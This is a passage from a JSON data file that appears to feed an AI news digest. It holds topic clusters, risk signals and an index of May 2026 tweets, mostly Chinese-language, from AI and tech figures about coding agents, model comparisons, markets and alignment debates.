"https://x.com/Pluvio9yte/status/2050063821377810451"], "item_texts": ["Karpathy:2025-12是AI编程拐点,最小单位从\"写代码\"升级为\"委派任务\"", "Anthropic BioMysteryBench:Claude Opus 4.6在生物信息学难题准确率81%"]}, {"id": "c5", "title": "开源与生态", "subtitle": "LeCun再杠开源限制", "level": "P2", "item_urls": ["https://x.com/ylecun/status/2050162348891979817", "https://x.com/runes_leo/status/2050127414630469937"], "item_texts": ["LeCun:Doomers想通过\"蒸馏攻击\"封禁开源,是在剥夺选择权", "匿名实验:Claude Code对含特定关键词的仓库报错\"out of extra usage\""]}, {"id": "c6", "title": "华语圈热点", "subtitle": "中文博主实操分享", "level": "P2", "item_urls": ["https://x.com/lxfater/status/2050240636020732015", "https://x.com/0xAA_Science/status/2050244250563182801"], "item_texts": ["铁锤人:Apple Support App用Claude Code打包", "0xAA:Cursor额度$150已用光,正在找循环任务消耗剩余$10000额度"]}], "risk_signals": [{"id": "r1", "level": "MID", "title": "Gary Marcus:AI对齐尚未解决,大规模部署风险极高", "detail": "Marcus认为从LLM获取真正对齐是痴心妄想,在没有健壮解决方案的情况下大规模部署LLM极其危险", "url": "https://x.com/GaryMarcus/status/2050296366161940584"}, {"id": "r2", "level": "MID", "title": "Gary Marcus:AI对GDP的贡献类似\"挖坑填坑\"", "detail": "引用David Sacks观点:付钱让人挖坑再填回去GDP也会涨,AI当前对GDP的贡献可能同样没有真正价值", "url": "https://x.com/GaryMarcus/status/2050284439343862266"}, {"id": "r3", "level": "OPP", "title": "用户隐私争议再起", "detail": "Gary Marcus:Meta就是Black Mirror的化身,用户隐私问题持续引发担忧", "url": "https://x.com/GaryMarcus/status/2050275183223857462"}]} + +推文索引(按 url 可回填 handle/date/text): +[{"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T19:28:41+00:00", "title": "If you think you are going to get alignment out of LLMs you are sadly mistaken.\n\nIf you live in a society in which people are rolling out LLMs at massive scale, without a robust solution to alignment (or even managing gremlins) you’re probably fucked.\n\nResist the proliferation of", "url": "https://x.com/GaryMarcus/status/2050296366161940584"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T19:26:58+00:00", "title": "Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children", "url": "https://x.com/pmarca/status/2050295934920302777"}, {"handle": "Stv_Lynn", "name": "Steven Lynn", "published_at": "2026-05-01T18:47:37+00:00", "title": "Media", "url": "https://x.com/Stv_Lynn/status/2050286033552736527"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T18:43:18+00:00", "title": "Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games \n\n@GovernorShapiro @david_adelman care to be my some of those nasty cheesesteaks for some bagels?! 😂\n\n[ sorry @celtics, you ", "url": "https://x.com/jason/status/2050284947345486290"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:41:17+00:00", "title": "AI and GDP - what does it mean?\n\nSure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it is currently measured, even though that activity has no value.”\n\nIn the case of AI, GDP is going up ", "url": "https://x.com/GaryMarcus/status/2050284439343862266"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T18:31:06+00:00", "title": "哈哈 @OpenAI 官号换掉了banner了\n很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。", "url": "https://x.com/CuiMao/status/2050281878322811194"}, {"handle": "0xAA_Science", "name": "0xAA", "published_at": "2026-05-01T18:31:03+00:00", "title": "一直想要个越野摩托车,这次张雪出了 MX250,支持一下。", "url": "https://x.com/0xAA_Science/status/2050281865245024365"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T18:25:15+00:00", "title": "Bill, the Knicks have won the east", "url": "https://x.com/jason/status/2050280406461677908"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:22:55+00:00", "title": "One of the things I hate the most about this site is the consistent lack of nuance.\n\nThat’s why everything is an argument, and progress here is so rare.", "url": "https://x.com/GaryMarcus/status/2050279819347448258"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:21:24+00:00", "title": "I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead.\n\nMaybe “clown” isn’t the right word here.", "url": "https://x.com/GaryMarcus/status/2050279436717785406"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T18:08:02+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2050276070952517767"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:04:30+00:00", "title": "Meta is basically Black Mirror incarnate.", "url": "https://x.com/GaryMarcus/status/2050275183223857462"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T18:04:01+00:00", "title": "“Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produces correct, secure, maintainable, well-architected software. The first is verifiable in seconds; the s", "url": "https://x.com/GaryMarcus/status/2050275059361792137"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T18:01:58+00:00", "title": "you know what\n\nall of these \"which is better\" polls are silly\n\nuse codex or claude code, whatever works best for you\n\ni am grateful we live in a time with such amazing tools, and grateful there is a choice", "url": "https://x.com/sama/status/2050274547061129577"}, {"handle": "liuliu", "name": "刘进", "published_at": "2026-05-01T17:33:05+00:00", "title": "What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches what Deep Research used to be around this time last year. It is a sad product story.", "url": "https://x.com/liuliu/status/2050267276893708414"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T17:30:46+00:00", "title": "Elon Musk, Sam Altman, the future of humanity, and … goblins.\n\nTerrific interview @theinformation with @rocketalignment \n\nhttps://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl", "url": "https://x.com/GaryMarcus/status/2050266692732014689"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T17:18:23+00:00", "title": "Last 10 Years\nNVIDIA $NVDA: +22,875%\nBitcoin $BTC: +17,205%\n$AMD: +10,030%\nTesla $TSLA: +2,362%\nApple $AAPL: +1,233%\nGoogle $GOOGL: +999%\nNetflix $NFLX: +932%\nMicrosoft $MSFT: +844%\nAmazon $AMZN: +717%\nMeta: $META: +425%\nS&P 500 $SPY: +312%\nGold $GLD: +245%\nUS Inflation: +39%", "url": "https://x.com/charliebilello/status/2050263578188333549"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T17:15:15+00:00", "title": "Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅\n\nAGENTS.md塞不下100万token的领域知识,\nRAG搜不到\"未知的未知\",\n我自己维护Skills维护到想吐。\n\n在公司里,新人入职花两周pair一下就能内化领域知识。\n现在跟AI协作,每个新session都是\"新人第一天\"——而且是个永远不会转正的新人。这个gap确实没被好的工具解决。\n\n如果有个工具能让用户持续喂入领域知识,且这些知识真正内化到推理里而不只是RAG式的检索拼接,那比现有方案高一个维度。至少目前", "url": "https://x.com/Pluvio9yte/status/2050262789256859872"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T17:07:00+00:00", "title": "说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯\n\n我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快\n\n以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果:\n\n1. 如果把省下的时间也一起交出去,只写prompt按Accept,那就跟刷老虎机没区别,退化是必然的\n\n2. 但是把省下的时间花在架构设计和code review上,认知负荷会不降反升\n\n简单说,AI干掉的是", "url": "https://x.com/Pluvio9yte/status/2050260712858210516"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T17:03:07+00:00", "title": "#FF @PeterMallouk, a great follow!", "url": "https://x.com/charliebilello/status/2050259734930800740"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T16:08:50+00:00", "title": "比我还抽象,刚才刷抖音,刷到个一个女的说,她自己用一个月的时间从什么都不懂的 AI 白痴,通过她的这套学习方法论,拿到了中厂的agent工程师 offer 😅😅😅😅,评论区一堆人求资料,\n这个逼社会太疯狂了,我已经看不懂了。", "url": "https://x.com/CuiMao/status/2050246075219693922"}, {"handle": "0xAA_Science", "name": "0xAA", "published_at": "2026-05-01T16:01:35+00:00", "title": "我发现 Cursor 额度还挺耐用的,使劲蹬才用掉了 $150,这 $10,000 得用到什么时候?\n看起来只有跑类似 auto research 的循环任务才能消耗掉这些 token 了!", "url": "https://x.com/0xAA_Science/status/2050244250563182801"}, {"handle": "0xAA_Science", "name": "0xAA", "published_at": "2026-05-01T15:59:10+00:00", "title": "目前 WTF AI 讨论群已经 700 多人了,如果你的申请没有通过,可以推特私信我你的 TG 昵称。", "url": "https://x.com/0xAA_Science/status/2050243640925233619"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T15:54:12+00:00", "title": "I mainly focus on AI tech research and honestly, I’m not into crypto at all. Pls stop sending me DMs about collabs. Thanks🫡🫡🫡", "url": "https://x.com/CuiMao/status/2050242393132396921"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T15:48:23+00:00", "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1jxXgeAleadJZ", "url": "https://x.com/jason/status/2050240926707314767"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-05-01T15:47:13+00:00", "title": "Apple Support App发布打包进了Claude.md 文件\n\n看来苹果$1B 建 Apple Intelligence已经彻底报废,都用上Cluade code,哈哈哈", "url": "https://x.com/lxfater/status/2050240636020732015"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T15:43:21+00:00", "title": "R to @GoSailGlobal: 提示词:\nRework the given image into a crayon-style illustration, transforming the entire scene into something that feels hand-drawn by a 10-year-old. Keep the forms simple and slightly imperfect, like a child’s drawing. Avoid using the original color palette—rep", "url": "https://x.com/GoSailGlobal/status/2050239662288146865"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T15:43:21+00:00", "title": "海外疯玩的prompt \n\n可以用来给自己的profile,生成一个十岁小孩的蜡笔画\n\n提示词放下面👇(截图+pormpt就行):", "url": "https://x.com/GoSailGlobal/status/2050239659377295552"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-05-01T15:31:23+00:00", "title": "不要和别人竞争。让他们变得无关紧要。\n\n你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就放弃了针对自身的优缺点制定灵活策略的选择,就已经输了。\n\n在你开始布局让他们变得无关紧要的时候,他们慢慢无法限制你,而你的策略只适合你自己的特点,别人无法简单模仿,你就已经开始赢了。", "url": "https://x.com/svwang1/status/2050236650329186525"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T15:30:01+00:00", "title": "发现海外的人真牛逼,AI真的可以做游戏啦❗️❗️\n\n这是 AI 做整套游戏角色目前唯一能跑通的工作流\n\n99% 的人卡在 walk cycle(走路循环动画,左右腿交替的连续动作)上,是因为他们一直试图用 GPT Image 2.0(OpenAI 最新的图像生成模型)/ Nano Banana 2(Google Gemini 的图像生成模型代号)解决 \n\n无论怎么 prompt(给 AI 的文字指令)、怎么传参考图,图像模型就是做不出对的走路循环 左右腿对不上、人物飘出画框、scaling(缩放比例)会乱\n\n🌟 视频模型在这一步反而无敌 \n\nSeedan", "url": "https://x.com/GoSailGlobal/status/2050236307721584945"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T15:24:04+00:00", "title": "R to @paulg: I was trying to think what's the opposite of this kind of company. Who really respects their customers? And I realized (I swear I didn't set this up) the answer is YC. YC's customers are Tony Xu and Brian Chesky and the Collisons. Respect? More like awe, frankly.", "url": "https://x.com/paulg/status/2050234809188761677"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-05-01T15:21:59+00:00", "title": "不要和别人竞争。让他们变得无关紧要。你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就已经输了。", "url": "https://x.com/svwang1/status/2050234282208317919"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:18:10+00:00", "title": "RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", "url": "https://x.com/sama/status/2050233324963008553"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T15:18:10+00:00", "title": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", "url": "https://x.com/paulg/status/2050233324963008553"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T15:06:52+00:00", "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1yKAPMBDzLyxb", "url": "https://x.com/jason/status/2050230480751243284"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T15:03:25+00:00", "title": "终于。\n\nClaude Code 长 session 跑久了,/resume 卡到怀疑人生,每次启动还得等最慢那个 MCP 拖几秒到十几秒——CC 重度用户应该都熟。这次一波修了。\n\n实打实有体感的两条:\n• /resume 在 40MB+ session 上快了 67%,50MB 的 /branch 上限也砍了——我自己 subagent 转录飙到过 122M(人家 50MB 上限的两倍多),主 session 也常驻 55M+,这次提速能直接吃到\n• MCP servers 改成并发连接,启动不再卡最慢那个——装了 serena / playwrig", "url": "https://x.com/runes_leo/status/2050229609795407876"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-05-01T15:02:00+00:00", "title": "Why Google is a mega-buy on the back of the Anthropic investment \n\n\"Google becomes a win on multiple fronts.\n\nThey benefit whether usage goes to Gemini or Anthropic.\n\nThey have unmatched compute capacity and cash flow, letting them allocate resources across their own models and p", "url": "https://x.com/HarryStebbings/status/2050229254705553516"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:01:14+00:00", "title": "R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amazing life of prosperity.", "url": "https://x.com/sama/status/2050229060887044494"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:01:13+00:00", "title": "R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong.\n\nthough of course there will be disruption/significant transition as we switch to new jobs, the jobs of the future may look v differe", "url": "https://x.com/sama/status/2050229059507159242"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:01:13+00:00", "title": "we want to build tools to augment and elevate people, not entities to replace them.", "url": "https://x.com/sama/status/2050229058425045178"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T14:50:44+00:00", "title": "比起疯传的那个风格,我自己更偏爱这个风格。\n\nPrompt:\n「彩色潦草小狗线条风格绘制该图,童趣和doodle加入其中,务必使用毫无章法的绘制手法,凌乱和草率即可。』", "url": "https://x.com/berryxia/status/2050226420681757102"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T14:42:53+00:00", "title": "RT by @paulg: A 7-million parameter model outperforming models a thousand times its size on tasks like ARC Prize. That's what recursive reasoning unlocks.\n\nIn this episode of Decoded, YC's @agupta and @FrancoisChauba1 break down two recent papers on recursive AI models, HRMs and ", "url": "https://x.com/paulg/status/2050224443461718118"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T14:37:39+00:00", "title": "“ChatGPT,你陪我段时间了,我想看看你的样子。请成一张类似你iPhone随拍的照:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种“过于真实的随手一拍感\",就像是从口袋里拿出手机不小心按到的自拍。”", "url": "https://x.com/berryxia/status/2050223126739665337"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T14:30:32+00:00", "title": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。\n\n这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。\n\n以下是几个核心信息:\n\n1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公司,简单说就是水电煤那种)。只要业务足够大、增速足够快,利润率低他不在乎。\n\n2. 他说 AI 的 switching costs(切换成本)正在崩塌。还拿", "url": "https://x.com/Pluvio9yte/status/2050221337424408733"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T14:29:58+00:00", "title": "🚀 GameHub Evolution 正式上线!\n\n架构全面大升级,Steam启动速度翻倍 + Epic Games 原生集成,手机玩PC大作体验直接起飞!\n\n1. Steam Launch Boost:游戏启动速度提升数倍\n\n2. Ultimate Virtual Controls + 配置分享:最强大自定义布局 + Share Code 一键分享\n\n3. Epic Games 原生集成:直接访问海量 Epic 游戏库\n\n4. 横竖屏无缝切换 + 复古模拟器:经典游戏掌上畅玩\n\nEarly Access 版本,已不支持回退旧版,欢迎大家反馈!\n\n官方", "url": "https://x.com/berryxia/status/2050221193752637888"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T14:15:19+00:00", "title": "This is an instance of the more general principle: If you are graduating university and are about to join a consulting firm, don't do that.", "url": "https://x.com/paulg/status/2050217507374457280"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T14:03:27+00:00", "title": "近期市面上出现eLink可编程eUICC实体卡,芯片布局上与eSTK极其相似,暂不明确该卡的EID及制造厂商\n不做推荐,我已在他们淘宝店「eLink Store」下单\n\n目前市面上的实体eSIM卡均不可缺少的功能:\n支持自定义ARA-M权限配置\n兼容各类写卡软件及读卡器读写\n并可通过STK菜单实现eSIM Profile下载、切换与管理", "url": "https://x.com/realNyarime/status/2050214520162038238"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T13:48:51+00:00", "title": "The Nasdaq Composite just crossed above 25,000 for the first time. A year ago it was at 18,000. 5 years ago it was at 14,000. 10 years ago it was at 4,800.", "url": "https://x.com/charliebilello/status/2050210847650132146"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T13:42:36+00:00", "title": "Theo 这条说得挺实在的:GPT 更聪明能帮你 unblock,但会以很蠢的方式卡住;Opus 会走一些很野的路径,但对你意图的理解确实更好。\n\n他的结论是根据任务类型来回切换,而不是站队。\n\n这跟我自己的体感基本一致。我现在日常编程也是双工具流:\n\n1. 需要快速解决一个明确的技术问题、查 API 用法、debug 报错信息,GPT 响应快、知识面广,确实好用\n\n2. 需要做一个比较复杂的重构、写一个完整的功能模块,Opus 对上下文和意图的把握更稳,不容易跑偏\n\n3. 写作、翻译这类对语感要求高的任务,Opus 还是明显更好\n\nTheo 还提了一个", "url": "https://x.com/Pluvio9yte/status/2050209273310060805"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T13:36:12+00:00", "title": "破案了,应该是美团的模型😄", "url": "https://x.com/berryxia/status/2050207663892627601"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T13:34:42+00:00", "title": "First Silicon Valley captured the US Government, and now it is capturing “independent” media.", "url": "https://x.com/GaryMarcus/status/2050207285377417591"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T13:21:35+00:00", "title": "The S&P 500 hit its 11th all-time high of the year yesterday.\n\nVideo: https://www.youtube.com/watch?v=IC55jwli3-8&t=858s", "url": "https://x.com/charliebilello/status/2050203982388142245"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T13:04:04+00:00", "title": "Stop making coding agents...\n\nhttps://www.dpcode.cc/", "url": "https://x.com/dingyi/status/2050199576603468134"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T13:04:00+00:00", "title": "RT by @charliebilello: The market isn’t red or blue - it’s green.\nIt doesn’t care about politics.\nIt runs on earnings, innovation, and growth.", "url": "https://x.com/charliebilello/status/2050199558995738866"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T12:56:38+00:00", "title": "Since the start of the Iran war...\nJet Fuel: +80%\nSulfur: +68%\nHeating Oil: +56%\nWTI Crude Oil: +55%\nBrent Crude Oil: +52%\nDiesel: +48%\nGasoline: +47%\nUrea: +47%\nEuropean Nat Gas: +44%\nFertilizer: +23%\nCoal: +13%\nPalm Oil: +13%\nIron Ore: +8%\nWheat: +6%\nS&P 500: +5%\n$VIX: -15%", "url": "https://x.com/charliebilello/status/2050197704941158556"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T12:50:39+00:00", "title": "Gas prices in the US have moved up to $4.39 per gallon, their highest level since July 2022. The 47% spike over the last 9 weeks ($2.98/gallon to $4.39/gallon) is the biggest we've seen in the past 30 years.", "url": "https://x.com/charliebilello/status/2050196201014718675"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T12:48:53+00:00", "title": "英文圈 freelancer 每月从客户那拿 $5K-$25K 做的事 \n\nAnthropic 官方在一个 30 分钟的视频里全讲完了\n\n中文圈知道的人不到 1%,传开就没差价了\n\n他们做的就一件事 把 Claude Code SDK + GitHub Action 接到客户自己的代码仓库里,做成一套自动化的工程流水线\n\n为什么客户愿意为这个付钱?\n\n 不是 AI 写代码这件事值钱,是「把 AI 放进生产环境、且不会乱删生产代码」这件事值钱\n\nAnthropic Claude Code 工程负责人 Sid Bidasaria 在视频里讲了三个分水岭\n1️", "url": "https://x.com/GoSailGlobal/status/2050195755936448705"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T12:40:47+00:00", "title": "RT by @paulg: This is remarkable and you should watch this entire video.\n\nThe House was going to pass a 45 day extension of FISA 702 (Foreign Intelligence Surveillance Act), BY VOICE WITHOUT VOTING, and Thomas Massie courageously forced a debate and demanded a recorded vote.\n\nJim", "url": "https://x.com/paulg/status/2050193715063300532"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T12:33:04+00:00", "title": "大部分人的 RAG 系统,只检索一次就完事了——这可能是你效果上不去的最大原因。\n\nvia @omarsar0 这条帖子讲的是「推理过程中什么时候该去检索」,AI 开发者建议收藏。\n\n核心观点拆解:\n\n1️⃣ 多数 RAG 系统的做法是:用户提问 → 检索一次 → 丢给模型生成答案。一锤子买卖,检索质量不够,后面全白搭。\n\n2️⃣ 更好的思路是在推理过程中动态触发检索——模型推到一半发现信息不够,再去拿一轮上下文,而不是开头一把梭。\n\n3️⃣ 这背后的逻辑是:复杂问题往往需要多跳推理,第一次检索拿到的文档不一定能覆盖所有子问题,中途补检索才能让推理链不断", "url": "https://x.com/GoSailGlobal/status/2050191775881736409"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T12:25:12+00:00", "title": "牛逼,今天刷到一篇帖子,然后成功用这个方法双开了微信👇\n\n只需要将这段话发给Codex:\n\n使用该项目 https://github.com/mcncarl/yichen-skills/tree/main/mac-wechat-dual-open 帮我安装微信双开。把它的图标换成蓝色。", "url": "https://x.com/Pluvio9yte/status/2050189794324713656"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T12:21:44+00:00", "title": "孙割是真割啊\n\n我是懒得去试\n\n积分额度随便调,背后调度可想而知😅", "url": "https://x.com/GoSailGlobal/status/2050188921665941984"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-05-01T12:21:36+00:00", "title": "身体脆弱就会造成精神脆弱\n\n精神脆弱就会导致效率低下", "url": "https://x.com/lxfater/status/2050188888744804410"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-05-01T12:00:26+00:00", "title": "Gemini会员每个月能领谷歌云额度,别忘啦,Pro10美金/月,Ultra100美金/月\n\n一次有效期一年,用不到就先攒着吧😄\n\nhttps://me.developers.google.com/benefits?hl=zh-cn", "url": "https://x.com/gkxspace/status/2050183561316016186"}, {"handle": "liuliu", "name": "刘进", "published_at": "2026-05-01T11:34:44+00:00", "title": "RT by @liuliu: 浏览器里跑 ASR 真的不是梦,一个完全没做啥优化的版本就能做到很高的准确率和推理速度了,估计我能优化到 0.04 这个速度(浏览器识别1秒音频需要 0.04秒时间)", "url": "https://x.com/liuliu/status/2050177096505561140"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T11:19:10+00:00", "title": "RT by @paulg: I am very saddened by the news that Martijn van der Vorm has passed away.\n\nIt is safe to say that, without Martijn, The Ocean Cleanup wouldn’t be where it is today, or perhaps wouldn’t be here at all. He was one of the first people to support us in a major way. It w", "url": "https://x.com/paulg/status/2050173178689749188"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-05-01T10:53:28+00:00", "title": "I am sorry but work from home Friday is a 4-day work week. Even worse when the Friday is a sunny Friday. \n\nBack to the office. 996.", "url": "https://x.com/HarryStebbings/status/2050166710645268939"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-05-01T10:36:08+00:00", "title": "RT by @ylecun: All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned. \n\nIt's really as simple as that.\n\nThey want to take away your right to choose, and take away businesses' rights to fine tune and make your p", "url": "https://x.com/ylecun/status/2050162348891979817"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T10:15:11+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2050157073883902069"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T10:10:19+00:00", "title": "Co-sign.", "url": "https://x.com/pmarca/status/2050155852460675379"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T10:05:55+00:00", "title": "GPT 5.5 可以通过设定目标和指标\n\n自行迭代优化🔁", "url": "https://x.com/GoSailGlobal/status/2050154742480040440"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T09:31:03+00:00", "title": "RT by @CuiMao: I LOVE Deepseek-v4-flash, incredibly reliable and capable, logical. It's lacking in frontend but I have MiMo for that. \n\nI would recommend any company spending 100k+ a year on AI to purchase 8-10~ 6000s and have a few of the works to have them blind test these mode", "url": "https://x.com/CuiMao/status/2050145968553709999"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T09:21:25+00:00", "title": "RT by @pmarca: A great summary of the 21st century so far", "url": "https://x.com/pmarca/status/2050143545525211213"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T09:17:00+00:00", "title": "那些餐饮店的饮料还以为是做慈善\n原来进货价就1毛钱一瓶水实测可以买很多瓶\n自己有多少个号买多少个号,应该不是敌敌畏\n0.1🉐百花蜂蜜500g\nhttps://u.jd.com/fOY2tiP\n0.1🉐弱碱苏打水300ml*1瓶\nhttps://u.jd.com/fgYnQ2p\n0.1🉐金银花罗汉果茶360ml*1瓶\nhttps://u.jd.com/fOYTQzZ\n0.1🉐百合绿豆水400ml*1瓶\nhttps://u.jd.com/f6YpRFx", "url": "https://x.com/realNyarime/status/2050142432088526883"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T09:15:45+00:00", "title": "北京环球影城!✌️", "url": "https://x.com/CuiMao/status/2050142119604691422"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T08:57:02+00:00", "title": "这个音频组件库做得太完美了。\n\nhttps://audio.raphaelsalaja.com/", "url": "https://x.com/dingyi/status/2050137408268886450"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T08:55:20+00:00", "title": "从昨天开始有不少网友反馈iOS推送异常,原因未知\n在对 http://push.apple.com 分流后仍无法接到Telegram等App推送,切换外区Apple ID后恢复,但CN直连失败\n\n这是Apple自App Store对中国大陆IP重定向至/cn(国区商店)后,进一步限制移动端设备推送,暂不影响macOS", "url": "https://x.com/realNyarime/status/2050136980454031800"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:49:27+00:00", "title": "On Project Fear.", "url": "https://x.com/pmarca/status/2050135501550883051"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:48:42+00:00", "title": "…", "url": "https://x.com/pmarca/status/2050135309053276499"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:47:13+00:00", "title": "…", "url": "https://x.com/pmarca/status/2050134937396007224"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:38:10+00:00", "title": "Self recommending.", "url": "https://x.com/pmarca/status/2050132661348561361"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:33:16+00:00", "title": "I remember that moral panic too! And the one before that, when the Anarchist’s Cookbook was being [shudder] photocopied.", "url": "https://x.com/pmarca/status/2050131426499301840"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:31:37+00:00", "title": "“Jack Valenti [then head of the film industry’s MPAA] famously told a congressional panel in 1982, ‘I say to you that the VCR is to the American film producer and the American public as the Boston Strangler is to the woman home alone.’”", "url": "https://x.com/pmarca/status/2050131011095404902"}, {"handle": "0xAA_Science", "name": "0xAA", 